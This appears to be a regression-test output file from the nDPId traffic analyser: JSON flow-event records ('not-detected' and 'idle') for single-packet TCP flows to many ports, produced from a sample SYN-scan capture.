+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 